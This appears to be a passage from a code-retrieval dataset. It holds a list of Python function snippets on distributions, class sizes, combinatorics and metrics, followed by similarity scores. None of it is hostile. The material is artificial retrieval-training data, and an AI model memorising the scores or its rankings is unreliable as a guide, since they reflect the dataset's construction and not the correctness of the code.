"def main():\n for combination in indicated_combinations(7, 3):\n print(\"{}: {}\".format(\"\".join(map(str, combination)),\n (longest_consecutive_run(combination, 7))))\n run_lengths = Counter(longest_consecutive_run(combination, 7)\n for combination in indicated_combinations(7, 3))\n print(\"Lengths: {}\".format(run_lengths))\n print(\"Total N_3: {}\".format(run_lengths[3]))\n print(\"Total N_2: {}\".format(run_lengths[2]))\n print(\"Proportion N_3 / (N_3 + N_2): {}\".format(\n Fraction(run_lengths[3], run_lengths[2] + run_lengths[3])))",
"def get_typical_size(workers: List[List[int]]) -> int:\n size = 0\n for worker in workers:\n size = max([size,\n np.abs(worker[2]-worker[0]),\n np.abs(worker[3]-worker[1])])\n \n return size",
"def Type(self) -> _n_6_t_5:",
"def freq(self) -> int:",
"def get_total_disc_effect_size(self, nmontecarlo=20000):\n \n if self.total_disc_es is None:\n disc_log_evidences = [self.results[kernel].summary(b=self.b)['evidence']['md'] \n for kernel in self.kernel_dict.keys()]\n M = len(disc_log_evidences)\n Z = logSumExp(disc_log_evidences)\n disc_evidences = np.exp(disc_log_evidences - Z)\n disc_stats = [self.results[kernel].summary(b=self.b)['es_disc_stats'] \n for kernel in self.kernel_dict.keys()]\n samples = list() \n for i in range(M):\n samples += list(np.random.normal(loc=disc_stats[i][0], \n scale=disc_stats[i][1], \n size=int(nmontecarlo*disc_evidences[i])))\n \n kde_fit = stats.gaussian_kde(samples, bw_method='silverman')\n xrange = np.linspace(np.min(samples), np.max(samples), 500)\n es_bma = kde_fit(xrange)\n self.total_disc_es = np.sum(xrange*es_bma) * (xrange[1]-xrange[0])\n self.total_disc_pdf = (xrange, es_bma)\n return self.total_disc_es",
"def get_age_distribution(school_type, N_classes):\n\tage_bracket = get_age_bracket(school_type)\n\tclasses = list(range(1, N_classes + 1))\n\tN_age_bracket = len(age_bracket)\n\tclasses_per_age_bracket = int(N_classes / N_age_bracket)\n\t\n\tassert N_age_bracket <= N_classes, \\\n\t'not enough classes to accommodate all age brackets in this school type!'\n\t\n\tage_bracket_map = {i:[] for i in age_bracket}\n\t\n\t# easiest case: the number of classes is divisible by the number of floors\n\tif N_classes % N_age_bracket == 0:\n\t\tfor i, age_bracket in enumerate(age_bracket):\n\t\t\tage_bracket_map[age_bracket] = classes[i * classes_per_age_bracket:\\\n\t\t\t\t\t i * classes_per_age_bracket + classes_per_age_bracket]\n\t\t\n\t# if there are leftover classes: assign them one-by-one to the existing \n\t# age brackets, starting with the lowest\n\telse:\n\t\tleftover_classes = N_classes % N_age_bracket\n\t\tclasses_per_age_bracket += 1\n\t\tfor i, age_bracket in enumerate(age_bracket):\n\t\t\tif i < leftover_classes:\n\t\t\t\tage_bracket_map[age_bracket] = \\\n\t\t\t\t\t\tclasses[i * classes_per_age_bracket: \\\n\t\t\t\t\t\ti * classes_per_age_bracket + classes_per_age_bracket]\n\t\t\t# hooray, index magic!\n\t\t\telse:\n\t\t\t\tage_bracket_map[age_bracket] = \\\n\t\t\t\t\tclasses[leftover_classes * classes_per_age_bracket + \\\n\t\t\t\t\t (i - leftover_classes) * (classes_per_age_bracket - 1):\n\t\t\t\t\tleftover_classes * (classes_per_age_bracket) + \\\n\t\t\t\t\t (i - leftover_classes) * (classes_per_age_bracket - 1) + \\\n\t\t\t\t\t classes_per_age_bracket - 1]\n\t\n\t# invert dict for easier use\n\tage_bracket_map_inv = {}\n\tfor age_bracket, classes in age_bracket_map.items():\n\t\tfor c in classes:\n\t\t\tage_bracket_map_inv.update({c:age_bracket}) \n\t\t\t\t\n\treturn age_bracket_map_inv",
"def design_complexity(design: Design) -> int:\n diversity = 3 * len(design.required)\n abundance = 2 * sum(design.required.values())\n return diversity + abundance + design.additional",
"def evaluate_power(soldier_list: List[Soldier]):\n inf_count = 0\n inf_avg_weapon = 0.0\n inf_avg_armor = 0.0\n arc_count = 0\n arc_avg_weapon = 0.0\n arc_avg_armor = 0.0\n cvl_count = 0\n cvl_avg_weapon = 0.0\n cvl_avg_armor = 0.0\n \n for soldier in soldier_list:\n ################################# YOUR CODE HERE #################################\n if soldier.typecode == \"ARC\":\n arc_count += 1\n arc_avg_armor += soldier.armor\n arc_avg_weapon += soldier.weapon\n elif soldier.typecode == \"INF\":\n inf_count += 1\n inf_avg_armor += soldier.armor\n inf_avg_weapon += soldier.weapon\n elif soldier.typecode == \"CVL\":\n cvl_count += 1\n cvl_avg_armor += soldier.armor\n cvl_avg_weapon += soldier.weapon\n if arc_count != 0:\n arc_avg_armor /= arc_count\n arc_avg_weapon /= arc_count\n\n if cvl_count != 0:\n cvl_avg_armor /= cvl_count\n cvl_avg_weapon /= cvl_count\n\n if inf_count != 0:\n inf_avg_armor /= inf_count\n inf_avg_weapon /= inf_count\n ##################################################################################\n return (inf_count, inf_avg_weapon, inf_avg_armor), (arc_count, arc_avg_weapon, arc_avg_armor), (cvl_count, cvl_avg_weapon, cvl_avg_armor)",
"def fitness(self):\n return (len(self.body)**2) * self.age",
"def count_topic_dist(self):\n if len(self.representants) == 0:\n self.log_writer(\"Representants not set. Cannot make topic dist.\")\n return\n for key, value in self.representants.items():\n self.topic_distributions.append(len(value)/len(self.training_docs))\n self.topic_numbers.append(key)",
"def occupation_distribution(data):",
"def DPI(self):\r\n logger.info(\"DPI (Dependency Parent Inherited)\")\r\n logger.info(\"Step1: Get all parent and child classes\")\r\n inh = self.get_node_by_name(\"inheritance\")\r\n logger.debug(\"inheritance: %s\" % inh)\r\n logger.info(\"Step2: Get all Depends relation classes\")\r\n dep = self.get_node_by_name(\"depends\")\r\n logger.debug(\"depends: %s\" % dep)\r\n return self.__DPI_helper(inh, dep)",
"def get_size_distribution(self) -> Dict[int, int]:\n size_dist = dict()\n for complex_expression, complex_abundance in self.get_all_complexes_and_abundances():\n current_size = complex_expression.get_size_of_complex()\n if current_size in size_dist:\n size_dist[current_size] += complex_abundance\n else:\n size_dist[current_size] = complex_abundance\n sorted_dist = dict(sorted(size_dist.items(), key=lambda item: item[0]))\n return sorted_dist",
"def number_types(corpus):\n number_of_types = len(set(corpus))\n return number_of_types",
"def children_per_woman(self):\n return self.birthrate",
"def substructure_sim_exact(subtrees_1, subtrees_2):\n assert(len(subtrees_1) == len(subtrees_2))\n n = len(subtrees_1)\n f1 = np.zeros(n)\n for i in range(n):\n f1[i] = subtrees_1[i] == subtrees_2[i] # calculate the number of matching pairs\n\n return float(np.count_nonzero(f1)) / float(len(f1))",
"def classProbs(observation, tree, classes):\n res = classify(observation, tree) #res = results\n total = sum(res.values())\n probs = []\n for c in classes:\n if c in res.keys():\n probs.append(float(res[c])/total)\n else:\n probs.append(0)\n return probs",
"def purity_test(self):\n mean = filter_data(self.data,self.ancestors)['Class'].mean()\n if mean == 0:\n return 0\n elif mean == 1:\n return 1\n return None",
"def calcHeuristicFunc(self, dictio):\n\t\t_sum = 0\n\n\t\tfor u in self.unitlist:\n\t\t for p in self.units[u[0]]:\n\t\t nums = [0] *self.N**2\n\t\t for i in p:\n\t\t nums[dictio[i]-1] += 1\n\t\t for j in nums:\n\t\t if(j==0):\n\t\t _sum += 1\n\t\treturn _sum",
"def denominator(self,gold,length):\n size = length * (length - 1) \n\n gold_size = 0.0\n for lead in gold.keys():\n gold_size += len(gold[lead])\n \n #print 'Whazzup'\n #print gold_size\n #print size\n den1 = gold_size\n den2 = size - gold_size \n #print den1\n #print den2\n return den1/den2",
"def calculate(self):\n\n specificity = self.confusion_matrix.tn / (self.confusion_matrix.tn + self.confusion_matrix.fp)\n return 1 - specificity",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n\n # type A (finite and affine)\n if self._letter == 'A':\n # the formula is taken from Torkildsen - Counting\n # cluster-tilted algebras of type A\n if self.is_finite():\n n = self._rank\n a = binomial( 2*(n+1), n+1 ) // (n+2)\n if n % 2 == 1:\n a += binomial( n+1, (n+1)//2 )\n if n % 3 == 0:\n a += 2 * binomial( 2*n//3, n//3 )\n return a // (n+3)\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n elif self.is_affine():\n i,j = self._bi_rank\n i = ZZ(i)\n j = ZZ(j)\n n = i+j\n f = Euler_Phi()\n if i == j:\n return ( binomial( 2*i,i ) +\n sum( f(k) * binomial(2*i//k,i//k)**2\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // n ) // 4\n else:\n return sum( f(k) * binomial(2*i//k,i//k) *\n binomial(2*j//k,j//k)\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // ( 2 * n )\n\n # types B and C (finite and affine)\n elif self._letter in ['B', 'C']:\n # this formula is proven but nowhere published correctness\n # is clear enough that I don't think a warning is needed\n if self.is_finite():\n n = self._rank\n return binomial(2 * n, n) // (n + 1)\n\n elif self._letter in ['BB','CC']:\n # these two formulas are not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n if n%2==1:\n return binomial( 2*n-1, n-1 )\n else:\n return binomial( 2*n-1, n-1 ) + binomial( n-1, n//2 -1 )\n\n # type BC (affine)\n elif self._letter == 'BC':\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n return binomial( 2*n, n )\n\n # types BD and CD (affine)\n elif self._letter in ['BD','CD']:\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 2\n return 2*binomial( 2*n, n )\n\n # type D (finite and affine)\n elif self._letter == 'D':\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n if self.is_finite():\n if self._rank == 4:\n return 6\n else:\n f = Euler_Phi()\n n = ZZ(self._rank)\n return sum( f( n//k ) * binomial( 2*k, k )\n for k in n.divisors() ) // (2*n)\n # this formula is not yet proven\n elif self.is_affine():\n n = self._rank - 3\n if n == 2:\n return 9\n else:\n print(Warning (\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if n%2==1:\n return 2*binomial(2*n,n)\n else:\n return 2*binomial(2*n,n) + binomial(n, n//2)\n\n # the exceptional types are hard-coded\n # type E (finite, affine and elliptic)\n elif self._letter == 'E':\n if self.is_finite():\n if self._rank == 6:\n return 67\n elif self._rank == 7:\n return 416\n elif self._rank == 8:\n return 1574\n elif self.is_affine():\n if self._rank == 7:\n return 132\n elif self._rank == 8:\n return 1080\n elif self._rank == 9:\n return 7560\n elif self.is_elliptic():\n if self._rank == 8:\n return 49\n elif self._rank == 9:\n return 506\n elif self._rank == 10:\n return 5739\n\n # type F\n elif self._letter == 'F':\n if self.is_finite():\n return 15\n elif self.is_affine():\n return 60\n elif self.is_elliptic():\n if self._twist == [1,2]:\n return 90\n if self._twist == [1,1] or self._twist == [2,2]:\n return 35\n\n # type G\n elif self._letter == 'G':\n if self.is_finite():\n 
return 2\n elif self.is_affine():\n return 6\n elif self.is_elliptic():\n if self._twist == [1,3]:\n return 7\n if self._twist == [1,1] or self._twist == [3,3]:\n return 2\n\n # type X\n elif self._letter == 'X':\n if self._rank == 6:\n return 5\n elif self._rank == 7:\n return 2\n\n # otherwise the size is returned to be unknown\n else:\n print(\"Size unknown\")\n return NotImplemented",
"def get_effect_size(self):\n\n # search the xls file\n f = glob.glob(os.path.join(self.output, '*_peaks.xls'))\n if not os.path.exists(f[0]):\n raise ValueError('file missing in macs2 callpeak output: %s' % f)\n\n # top\n topN = 100\n counter = 0\n dep = {}\n # ip_depth = ip_scale = input_depth = input_scale = 0\n with open(f[0], 'rt') as fi:\n for line in fi:\n if not line.startswith('#'): \n continue\n if counter > 100: # nrows\n break # stop\n num = line.strip().split()[-1]\n if 'tags after filtering in treatment' in line:\n dep['ip_depth'] = num\n if 'tags in treatment' in line:\n s = 1e6 / int(num)\n dep['ip_scale'] = '%.6f' % s\n if 'tags after filtering in control' in line:\n dep['input_depth'] = num\n if 'tags in control' in line:\n s = 1e6 / int(num)\n dep['input_scale'] = '%.6f' % s\n counter += 1\n\n return dep",
"def main(n_samples):\n uso = usolib.uso.uar(N)\n lst = [usolib.randomfacet.randomfacet_sample(uso, N) for i in range(n_samples)]\n return sum(lst) / float(n_samples)",
"def mh(N, disttype):\n xs = np.array([])\n ys = np.array([])\n pos_now = (0,0)\n accept = 0\n for i in range(N):\n pos_cand = proposal_pdf(pos_now)\n prob_stay = target_pdf(pos_now, disttype)\n prob_move = target_pdf(pos_cand, disttype)\n if prob_move / prob_stay > np.random.uniform(0,1,1):\n pos_now = pos_cand\n xs = np.append(xs, pos_now[0])\n ys = np.append(ys, pos_now[1])\n accept += 1\n return xs, ys, accept/N",
"def pdf(self,x):\n return self.categoricalDist.pdf(x)",
"def analyse_type(self):\n \n t = \" \" # Holder string\n \n data_base = '/local/duman/SIMULATIONS/many_polymers_5/density_0.2/kappa_'\n path = data_base + str(self.k) + '/fp_' + str(self.f) + '/CLUSTER/avg_size.txt'\n if os.path.exists(path):\n data = np.loadtxt(path, dtype=float)\n else:\n data = 10.\n self.cs = data\n print path\n print data\n if data < 12.:\n t = \"gas\"\n elif data > 200.:\n t = \"giant\"\n else:\n t = \"cluster\"\n\n self.type = t # Type of point\n \n return",
"def main(duck, abstract, answer):\n set_duck = sorted(set(duck))\n for i in set_duck:\n if i > abstract / 2:\n break\n answer += duck.count(abstract - i) * duck.count(i)\n print(answer)",
"def get_perfect_information(self):\n raise NotImplementedError",
"def overrepresented_units(distribution, classes=None):\n # Regroup into classes if specified. Otherwise return categories indicated\n # in the data\n if not classes:\n classes = return_categories(distribution) \n\n\n ## Compute the representation of the different classes in all areal units\n rep = mb.representation(distribution, classes)\n\n ## Find the tracts where classes are overrepresented\n areal_units = {cl:[au for au in rep\n if rep[au][cl][0] > 1 + 2.57*math.sqrt(rep[au][cl][1])] \n for cl in classes}\n\n return areal_units"
] | [
"0.5700454",
"0.5624713",
"0.5599203",
"0.5592559",
"0.5505562",
"0.54669946",
"0.5466142",
"0.5449652",
"0.5400594",
"0.5398503",
"0.5343119",
"0.53286606",
"0.5312603",
"0.53101563",
"0.5294233",
"0.5283371",
"0.5280055",
"0.5267188",
"0.5262132",
"0.52526665",
"0.52496",
"0.5247098",
"0.52160513",
"0.52129257",
"0.5209133",
"0.52085245",
"0.5191606",
"0.51834834",
"0.5173392",
"0.51689976",
"0.51591647",
"0.5156737",
"0.5146902",
"0.5124393",
"0.5113049",
"0.51130044",
"0.5108708",
"0.5101223",
"0.510014",
"0.5098962",
"0.5087103",
"0.5083366",
"0.5078981",
"0.5068852",
"0.5062866",
"0.5057589",
"0.5054177",
"0.5053933",
"0.5049696",
"0.50486195",
"0.5048018",
"0.5048018",
"0.5048018",
"0.5048018",
"0.5045074",
"0.5044782",
"0.5040426",
"0.5040209",
"0.50333107",
"0.5025258",
"0.50246274",
"0.50243723",
"0.50240123",
"0.5016171",
"0.5011604",
"0.5009827",
"0.5002872",
"0.50005734",
"0.499256",
"0.49882713",
"0.49871576",
"0.498406",
"0.4980655",
"0.49775207",
"0.49713632",
"0.49664104",
"0.49661213",
"0.4963444",
"0.49608544",
"0.49536362",
"0.49522933",
"0.4950424",
"0.49500528",
"0.4948499",
"0.49478605",
"0.49430943",
"0.49406955",
"0.49326587",
"0.4927374",
"0.4926765",
"0.49257797",
"0.49249467",
"0.4923614",
"0.49228027",
"0.4919107",
"0.49174517",
"0.49173394",
"0.49161148",
"0.49137568",
"0.49130043"
] | 0.6394095 | 0 |
For a conjugate distinction return the number of base distinctions it needs to operate, and expects in the constructor. | def getNumberOfBaseDistinctionsNeeded():
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def conjugate(self, ???):",
"def num_conll(self):\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self):\n pass",
"def size_conjugacy_class(partition,n):\r\n aux1=1\r\n c=0\r\n aux=partition[0]\r\n flag = 1\r\n for j in range(len(partition)):\r\n if (aux == partition[j]):\r\n c = c + 1\r\n flag = 1\r\n else:\r\n aux1 = aux1*(partition[j-1]**c)*(math.factorial(c))\r\n aux = partition[j]\r\n c = 1\r\n flag = 0\r\n if (flag == 1):\r\n aux1 = aux1*(partition[j-1]**c)*(math.factorial(c))\r\n else: \r\n aux1 = aux1*(partition[j]**c)*(math.factorial(c))\r\n card = (math.factorial(n))/aux1\r\n return int(card)",
"def conjugate(self):\r\n return self.__class__(self._real, -self._imag)",
"def factor(self, conj=False):\n raise NotImplementedError()",
"def _compute_pico_concentration(dna_vals, size=500):\n lib_concentration = (dna_vals / (660 * float(size))) * 10**6\n\n return lib_concentration",
"def get_conjugate_bases_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate base of\")]\n else:\n return []",
"def conjugate(self, x):\n\n a = self.array_form\n b = x.array_form\n n = len(a)\n if len(b) != n:\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n invb = [None]*n\n for i in xrange(n):\n invb[b[i]] = i\n return _new_from_array_form([invb[a[i]] for i in b])",
"def cardinality(self):\n from sage.arith.all import binomial\n n = self._size\n if n == 0:\n return Integer(1)\n return (2 * binomial(4 * n + 1, n - 1)) // (n * (n + 1))\n # return Integer(2 * factorial(4*n+1)/(factorial(n+1)*factorial(3*n+2)))",
"def num_clbits(self):\n return 0",
"def __init__(self):\n GinacFunction.__init__(self, \"conjugate\",\n conversions=dict(sympy='conjugate'))",
"def NumCoefficients(self):\n return nchoosek(self.degree + self.dimension, self.degree, exact=True)",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n else:\n components = []\n multiplicities = []\n for x in self.irreducible_components():\n if components.count(x) == 0:\n components.append(x)\n multiplicities.append(1)\n else:\n y = components.index(x)\n multiplicities[y] = multiplicities[y]+1\n\n sizes = [ x.class_size() for x in components ]\n if NotImplemented in sizes:\n print(\"Size unknown\")\n return NotImplemented\n else:\n return prod( [binomial(sizes[i]+multiplicities[i]-1,\n multiplicities[i] ) for i in range (0,len(sizes))])",
"def conjugate(self):\n return self.__class__(scalar=self.scalar, vector= -self.vector)",
"def nC(self):\n return int(self._n.prod())",
"def n_components(self):\n return 1",
"def n_complex_components(self):\n return self.n_components // 2 + (self.n_components % 2)",
"def concentration(self):\n return self._gev_bijector.concentration",
"def conjugate(self):\n return Complex(self._reNum, -self._imNum)",
"def conjugate(x):\n if len(list(x.size())) == 2:\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = x[0]\n z[1] = -x[1]\n\n if len(list(x.size())) == 3:\n z = torch.zeros(\n 2, x.size()[2], x.size()[1], dtype=torch.double, device=x.device\n )\n z[0] = torch.transpose(x[0], 0, 1)\n z[1] = -torch.transpose(x[1], 0, 1)\n\n return z",
"def get_cnu(nu_min, nu_max, n_nu):\n ## Frequency grids; border, difference, centre [b, d, c]\n bnu = nu_min * (nu_max/nu_min)**(np.arange(n_nu+1)/float(n_nu))\n #dnu = bnu[1:] - bnu[0:n_nu]\n cnu = np.sqrt( bnu[1:] * bnu[0:n_nu] )\n return cnu",
"def nC(self):\n return int(self.vnC.prod())",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n\n # type A (finite and affine)\n if self._letter == 'A':\n # the formula is taken from Torkildsen - Counting\n # cluster-tilted algebras of type A\n if self.is_finite():\n n = self._rank\n a = binomial( 2*(n+1), n+1 ) // (n+2)\n if n % 2 == 1:\n a += binomial( n+1, (n+1)//2 )\n if n % 3 == 0:\n a += 2 * binomial( 2*n//3, n//3 )\n return a // (n+3)\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n elif self.is_affine():\n i,j = self._bi_rank\n i = ZZ(i)\n j = ZZ(j)\n n = i+j\n f = Euler_Phi()\n if i == j:\n return ( binomial( 2*i,i ) +\n sum( f(k) * binomial(2*i//k,i//k)**2\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // n ) // 4\n else:\n return sum( f(k) * binomial(2*i//k,i//k) *\n binomial(2*j//k,j//k)\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // ( 2 * n )\n\n # types B and C (finite and affine)\n elif self._letter in ['B', 'C']:\n # this formula is proven but nowhere published correctness\n # is clear enough that I don't think a warning is needed\n if self.is_finite():\n n = self._rank\n return binomial(2 * n, n) // (n + 1)\n\n elif self._letter in ['BB','CC']:\n # these two formulas are not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n if n%2==1:\n return binomial( 2*n-1, n-1 )\n else:\n return binomial( 2*n-1, n-1 ) + binomial( n-1, n//2 -1 )\n\n # type BC (affine)\n elif self._letter == 'BC':\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n return binomial( 2*n, n )\n\n # types BD and CD (affine)\n elif self._letter in ['BD','CD']:\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 2\n return 2*binomial( 2*n, n )\n\n # type D (finite and affine)\n elif self._letter == 'D':\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n if self.is_finite():\n if self._rank == 4:\n return 6\n else:\n f = Euler_Phi()\n n = ZZ(self._rank)\n return sum( f( n//k ) * binomial( 2*k, k )\n for k in n.divisors() ) // (2*n)\n # this formula is not yet proven\n elif self.is_affine():\n n = self._rank - 3\n if n == 2:\n return 9\n else:\n print(Warning (\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if n%2==1:\n return 2*binomial(2*n,n)\n else:\n return 2*binomial(2*n,n) + binomial(n, n//2)\n\n # the exceptional types are hard-coded\n # type E (finite, affine and elliptic)\n elif self._letter == 'E':\n if self.is_finite():\n if self._rank == 6:\n return 67\n elif self._rank == 7:\n return 416\n elif self._rank == 8:\n return 1574\n elif self.is_affine():\n if self._rank == 7:\n return 132\n elif self._rank == 8:\n return 1080\n elif self._rank == 9:\n return 7560\n elif self.is_elliptic():\n if self._rank == 8:\n return 49\n elif self._rank == 9:\n return 506\n elif self._rank == 10:\n return 5739\n\n # type F\n elif self._letter == 'F':\n if self.is_finite():\n return 15\n elif self.is_affine():\n return 60\n elif self.is_elliptic():\n if self._twist == [1,2]:\n return 90\n if self._twist == [1,1] or self._twist == [2,2]:\n return 35\n\n # type G\n elif self._letter == 'G':\n if self.is_finite():\n 
return 2\n elif self.is_affine():\n return 6\n elif self.is_elliptic():\n if self._twist == [1,3]:\n return 7\n if self._twist == [1,1] or self._twist == [3,3]:\n return 2\n\n # type X\n elif self._letter == 'X':\n if self._rank == 6:\n return 5\n elif self._rank == 7:\n return 2\n\n # otherwise the size is returned to be unknown\n else:\n print(\"Size unknown\")\n return NotImplemented",
"def _get_concentration(self, state):\n return self.fc(state.float_features).exp() + self.EPSILON",
"def number_of_bits(self) -> int:\n raise NotImplementedError('To be Overidden by the derived class')",
"def nClumps(self):\n \n return len(self)",
"def conj(z):",
"def conjugate(self):\n parts = list(self)\n # Destroy the diagram column by column, adding each column\n # to the new partition\n eat_diagram = [\n [x - k for x in parts if x - k > 0] for k in range(parts[0])]\n conj_part = [len(y) for y in eat_diagram]\n B = BosonicPartitions()\n return B(conj_part)",
"def number_of_connectives(formula):\n pass\n # ======== YOUR CODE HERE ========",
"def num_frac_bits(self):\n raise NotImplementedError(\"subclasses need to override this method\")",
"def nCr():\n return math.factorial(self.nn) / (math.factorial(self.rr) * math.factorial(self.nn - self.rr))",
"def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')",
"def conjugate(A):\n if A.is_complex():\n return A.conj()\n return A",
"def conj(x, *args, **kwargs):\n raise NotImplementedError",
"def n_cs(self):\n return np.size(self._cs, 0)",
"def n_cf(self):\n return np.size(self._ref_ii, 0)",
"def conjugate(self):\n v = zeros_como(self)\n for x in range(self.n):\n v[x] = (self[x]).conjugate()\n\n return v",
"def num_cochains(self) -> int:\n if self.__num_cochains__ is not None:\n return self.__num_cochains__\n return self.ptr.numel() + 1",
"def calculate_mcs(self):\n if self.support == 0:\n return 0\n\n e = 1/(self.sup_a*self.sup_c) + 1/(self.sup_a*(self.n-self.sup_c)) + 1/((self.n-self.sup_a)*self.sup_c) + 1/((self.n-self.sup_a)*(self.n-self.sup_c))\n mcs = (min(self.sup_a, self.sup_c) - self.sup_a * self.sup_c / self.n)**2 * self.n * e\n return mcs",
"def conj(self):\n res = self._defer_unary_elementwise(np.conj)\n res.dirs = list(map(opr.neg, res.dirs))\n res.charge = -res.charge\n if self.qodulus is not None:\n res.charge %= res.qodulus\n return res",
"def _num_conn_comp(graph):\n\n return nx.number_connected_components(graph)",
"def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'",
"def number_strongly_connected_components(G):\n return len(strongly_connected_components(G))",
"def derivitive(x):\n return x * 1",
"def conjugate(self):\n return self.rotate().dagger()",
"def convex_conj(self):\n return IndicatorNuclearNormUnitBall(\n self.domain,\n conj_exponent(self.outernorm.exponent),\n conj_exponent(self.pwisenorm.exponent))",
"def binomC(k,n):\n return np.double( comb(n, k, exact=1) )",
"def conjugate(self) -> np.ndarray:\n if self.scalar_vector:\n return self.array*np.array([1.0, -1.0, -1.0, -1.0])\n return self.array*np.array([-1.0, -1.0, -1.0, 1.0])",
"def n(self):\n raise NotImplementedError",
"def _qsd_l2_cx_count(self, n):\n return 9 / 16 * 4**n - 3 / 2 * 2**n",
"def cardinality_bit_delta(self,c0, c1):\n c0_bits = self.number_bits_in_cardinality(c0)\n c1_bits = self.number_bits_in_cardinality(c1)\n\n return int(math.fabs(c1_bits - c0_bits))",
"def dim(self) -> int:",
"def csize(grades):\n\tp = 0\n\tfor k in grades:\n\t\tl = _comb(n,k)\n\t\tp += l\n\treturn p",
"def csize(grades):\n\tp = 0\n\tfor k in grades:\n\t\tl = _comb(n,k)\n\t\tp += l\n\treturn p",
"def factor_carga(self):\r\n return self.nelementos() / self.n",
"def conjugate(quats):\n res = np.zeros(quats.shape)\n res[:,0]=quats[:,0]\n res[:,1]=-quats[:,1]\n res[:,2]=-quats[:,2]\n res[:,3]=-quats[:,3]\n \n return res",
"def size_in(self):\n if isinstance(self.ensemble.neuron_type, Direct):\n # This will prevent users from connecting/probing Direct neurons\n # (since there aren't actually any neurons being simulated).\n return 0\n return self.ensemble.n_neurons",
"def conj(q):\n q = np.array([q[0]])\n q[0,1]=-q[0,1]\n q[0,2]=-q[0,2]\n q[0,3]=-q[0,3]\n complexconjugate = quatreal(q)\n return complexconjugate",
"def proximal(self):\n if self.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.exponent == 2:\n return proximal_cconj_l2(space=self.domain)\n else:\n raise NotImplementedError('`gradient` only implemented for p=2 or '\n 'p=inf')",
"def bic(self):\n return np.log(self.sample_size) * self.number_of_parameters() - 2*self.ll[-1]",
"def con_ceq(x,project):\n \n cons = project.con_ceq(x)\n \n if cons: cons = array(cons)\n else: cons = zeros([0])\n \n return cons",
"def GetConcBeer(Abs, epsilon, pathLength):\n return Abs / (epsilon * pathLength)",
"def getAnsofBase(length, base):\n ans = 1\n for i in range(length-1):\n ans = ans * base + 1\n return ans",
"def calc_cophenetic_coeff(self):\n c, d = cophenet(self.__linkage, self.__distance_matrix)\n return round(c, 3)",
"def num_qubits(self) -> int:\n raise NotImplementedError()",
"def clebsch_gordan((J1,M1),(J2,M2),(J3,M3)):\n cg=(-1)**(J2-J1-M3)*math.sqrt(2*J3+1)*pygsl.sf.coupling_3j(int(2*J1), int(2*J2), int(2*J3), int(2*M1), int(2*M2),int(-2*M3))[0]\n #\n return cg",
"def __len__(self):\n num_x, num_y = self.conv_dims()\n return num_x * num_y",
"def _ncc_c(x, y):\r\n den = np.array(norm(x) * norm(y))\r\n den[den == 0] = np.Inf\r\n\r\n x_len = len(x)\r\n fft_size = 1 << (2*x_len-1).bit_length()\r\n cc = ifft(fft(x, fft_size) * np.conj(fft(y, fft_size)))\r\n cc = np.concatenate((cc[-(x_len-1):], cc[:x_len]))\r\n return np.real(cc) / den",
